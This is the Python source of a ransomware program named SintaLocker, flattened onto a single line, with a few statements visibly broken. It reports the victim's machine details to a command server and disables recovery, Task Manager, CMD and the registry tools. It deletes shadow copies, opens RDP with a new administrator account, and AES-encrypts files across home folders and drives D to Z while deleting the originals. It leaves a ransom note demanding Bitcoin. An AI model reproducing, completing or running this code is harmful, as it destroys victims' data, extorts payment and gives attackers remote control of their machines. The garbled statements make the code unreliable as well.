import os, fnmatch, struct, random, string, base64, platform, sys, time, socket, json, urllib, ctypes, urllib2 import SintaRegistery import SintaChangeWallpaper from Crypto import Random from Crypto.Cipher import AES rmsbrand = 'SintaLocker' newextns = 'sinta' encfolder = '__SINTA I LOVE YOU__' email_con = '' btc_address = '1NEdFjQN74ZKszVebFum8KFJNd9oayHFT1' userhome = os.path.expanduser('~') my_server = '' wallpaper_link = '' victim_info = base64.b64encode(str(platform.uname())) configurl = my_server + 'api.php?info=' + victim_info + '&ip=' + base64.b64encode(socket.gethostbyname(socket.gethostname())) glob_config = None try: glob_config = json.loads(urllib.urlopen(configurl).read()) if set(glob_config.keys()) != set(['MRU_ID', 'MRU_UDP', 'MRU_PDP']): raise Exception('0x00001') except IOError: time.sleep(1) victim_id = glob_config[u'MRU_ID'] victim_r = glob_config[u'MRU_UDP'] victim_s = glob_config[u'MRU_PDP'] try: os.system('bcdedit /set {default} recoveryenabled No') os.system('bcdedit /set {default} bootstatuspolicy ignoreallfailures') os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableRegistryTools /d 1 /f') os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableTaskMgr /d 1 /f') os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableCMD /d 1 /f') os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /t REG_DWORD /v NoRun /d 1 /f') except WindowsError: pass def setWallpaper(imageUrl): try: wallpaper = SintaChangeWallpaper.ChangeWallpaper() wallpaper.downloadWallpaper(imageUrl) except: pass def persistance(): try: SintaRegistery.addRegistery(os.path.realpath(__file__)) except: pass def destroy_shadow_copy(): try: os.system('vssadmin Delete Shadows /All /Quiet') except: pass def create_remote_desktop(): try: os.system('REG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f') os.system('net user ' + victim_r + ' ' + victim_s + ' /add') os.system('net localgroup administrators ' + victim_r + ' /add') except: pass def write_instruction(dir, ext): try: files = open(dir + '\\README_FOR_DECRYPT.' + ext, 'w') files.write('! ! ! OWNED BY ' + rmsbrand + ' ! ! !\r\n\r\nAll your files are encrypted by ' + rmsbrand + ' with strong chiphers.\r\nDecrypting of your files is only possible with the decryption program, which is on our secret server.\r\nAll encrypted files are moved to ' + encfolder + ' directory and renamed to unique random name.\r\nTo receive your decryption program send $100 USD Bitcoin to address: ' + btc_address + '\r\nContact us after you send the money: ' + email_con + '\r\n\r\nJust inform your identification ID and we will give you next instruction.\r\nYour personal identification ID: ' + victim_id + '\r\n\r\nAs your partner,\r\n\r\n' + rmsbrand + '') except: pass def delete_file(filename): try: os.remove(filename) except: pass def find_files(root_dir): write_instruction(root_dir, 'md') extentions = ['*.txt', '*.exe', '*.php', '*.pl', '*.7z', '*.rar', '*.m4a', '*.wma', '*.avi', '*.wmv', '*.csv', '*.d3dbsp', '*.sc2save', '*.sie', '*.sum', '*.ibank', '*.t13', '*.t12', '*.qdf', '*.gdb', '*.tax', '*.pkpass', '*.bc6', '*.bc7', '*.bkp', '*.qic', '*.bkf', '*.sidn', '*.sidd', '*.mddata', '*.itl', '*.itdb', '*.icxs', '*.hvpl', '*.hplg', '*.hkdb', '*.mdbackup', '*.syncdb', '*.gho', '*.cas', '*.svg', '*.map', '*.wmo', '*.itm', '*.sb', '*.fos', '*.mcgame', '*.vdf', '*.ztmp', '*.sis', '*.sid', '*.ncf', '*.menu', '*.layout', '*.dmp', '*.blob', '*.esm', '*.001', '*.vtf', '*.dazip', '*.fpk', '*.mlx', '*.kf', '*.iwd', '*.vpk', '*.tor', '*.psk', '*.rim', '*.w3x', '*.fsh', '*.ntl', '*.arch00', '*.lvl', '*.snx', '*.cfr', '*.ff', '*.vpp_pc', '*.lrf', '*.m2', '*.mcmeta', '*.vfs0', '*.mpqge', '*.kdb', '*.db0', '*.mp3', '*.upx', '*.rofl', '*.hkx', '*.bar', '*.upk', '*.das', '*.iwi', '*.litemod', '*.asset', '*.forge', '*.ltx', '*.bsa', '*.apk', '*.re4', '*.sav', '*.lbf', '*.slm', '*.bik', '*.epk', '*.rgss3a', '*.pak', '*.big', '*.unity3d', '*.wotreplay', '*.xxx', '*.desc', '*.py', '*.m3u', '*.flv', '*.js', '*.css', '*.rb', '*.png', '*.jpeg', '*.p7c', '*.p7b', '*.p12', '*.pfx', '*.pem', '*.crt', '*.cer', '*.der', '*.x3f', '*.srw', '*.pef', '*.ptx', '*.r3d', '*.rw2', '*.rwl', '*.raw', '*.raf', '*.orf', '*.nrw', '*.mrwref', '*.mef', '*.erf', '*.kdc', '*.dcr', '*.cr2', '*.crw', '*.bay', '*.sr2', '*.srf', '*.arw', '*.3fr', '*.dng', '*.jpeg', '*.jpg', '*.cdr', '*.indd', '*.ai', '*.eps', '*.pdf', '*.pdd', '*.psd', '*.dbfv', '*.mdf', '*.wb2', '*.rtf', '*.wpd', '*.dxg', '*.xf', '*.dwg', '*.pst', '*.accdb', '*.mdb', '*.pptm', '*.pptx', '*.ppt', '*.xlk', '*.xlsb', '*.xlsm', '*.xlsx', '*.xls', '*.wps', '*.docm', '*.docx', '*.doc', '*.odb', '*.odc', '*.odm', '*.odp', '*.ods', '*.odt', '*.sql', '*.zip', '*.tar', '*.tar.gz', '*.tgz', '*.biz', '*.ocx', '*.html', '*.htm', '*.3gp', '*.srt', '*.cpp', '*.mid', '*.mkv', '*.mov', '*.asf', '*.mpeg', '*.vob', '*.mpg', '*.fla', '*.swf', '*.wav', '*.qcow2', '*.vdi', '*.vmdk', '*.vmx', '*.gpg', '*.aes', '*.ARC', '*.PAQ', '*.tar.bz2', '*.tbk', '*.bak', '*.djv', '*.djvu', '*.bmp', '*.cgm', '*.tif', '*.tiff', '*.NEF', '*.cmd', '*.class', '*.jar', '*.java', '*.asp', '*.brd', '*.sch', '*.dch', '*.dip', '*.vbs', '*.asm', '*.pas', '*.ldf', '*.ibd', '*.MYI', '*.MYD', '*.frm', '*.dbf', '*.SQLITEDB', '*.SQLITE3', '*.asc', '*.lay6', '*.lay', '*.ms11 (Security copy)', '*.sldm', '*.sldx', '*.ppsm', '*.ppsx', '*.ppam', '*.docb', '*.mml', '*.sxm', '*.otg', '*.slk', '*.xlw', '*.xlt', '*.xlm', '*.xlc', '*.dif', '*.stc', '*.sxc', '*.ots', '*.ods', '*.hwp', '*.dotm', '*.dotx', '*.docm', '*.DOT', '*.max', '*.xml', '*.uot', '*.stw', '*.sxw', '*.ott', '*.csr', '*.key', 'wallet.dat'] for dirpath, dirs, files in os.walk(root_dir): if 'Windows' not in dirpath: for basename in files: for ext in extentions: if fnmatch.fnmatch(basename, ext): filename = os.path.join(dirpath, basename) yield filename def make_directory(file_path): directory = file_path + '' + encfolder if not os.path.exists(directory): try: os.makedirs(directory) except: pass def text_generator(size = 6, chars = string.ascii_uppercase + string.digits): return ''.join((random.choice(chars) for _ in range(size))) + '.' + newextns def generate_file(file_path, filename): make_directory(file_path) key = ''.join([ random.choice(string.ascii_letters + string.digits) for n in xrange(32) ]) newfilename = file_path + '\\' + encfolder + '\\' + text_generator(36, '1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm') try: encrypt_file(key, filename, newfilename) except: pass def encrypt_file(key, in_filename, newfilename, out_filename = None, chunksize = 65536, Block = 16): if not out_filename: out_filename = newfilename iv = ''.join((chr(random.randint(0, 255)) for i in range(16))) encryptor =, AES.MODE_CBC, iv) filesize = os.path.getsize(in_filename) with open(in_filename, 'rb') as infile: with open(out_filename, 'wb') as outfile: outfile.write(struct.pack('<Q', filesize)) outfile.write(iv) while True: chunk = if len(chunk) == 0: break elif len(chunk) % 16 != 0: chunk += ' ' * (16 - len(chunk) % 16) outfile.write(encryptor.encrypt(chunk)) listdir = (userhome + '\\Contacts\\', userhome + '\\Documents\\', userhome + '\\Downloads\\', userhome + '\\Favorites\\', userhome + '\\Links\\', userhome + '\\My Documents\\', userhome + '\\My Music\\', userhome + '\\My Pictures\\', userhome + '\\My Videos\\', 'D:\\', 'E:\\', 'F:\\', 'G:\\', 'I:\\', 'J:\\', 'K:\\', 'L:\\', 'M:\\', 'N:\\', 'O:\\', 'P:\\', 'Q:\\', 'R:\\', 'S:\\', 'T:\\', 'U:\\', 'V:\\', 'W:\\', 'X:\\', 'Y:\\', 'Z:\\') for dir_ in listdir: for filename in find_files(dir_): generate_file(dir_, filename) delete_file(filename) persistance() destroy_shadow_copy() create_remote_desktop() write_instruction(userhome + '\\Desktop\\', 'txt') os.startfile(userhome + '\\Desktop\\README_FOR_DECRYPT.txt') setWallpaper(wallpaper_link)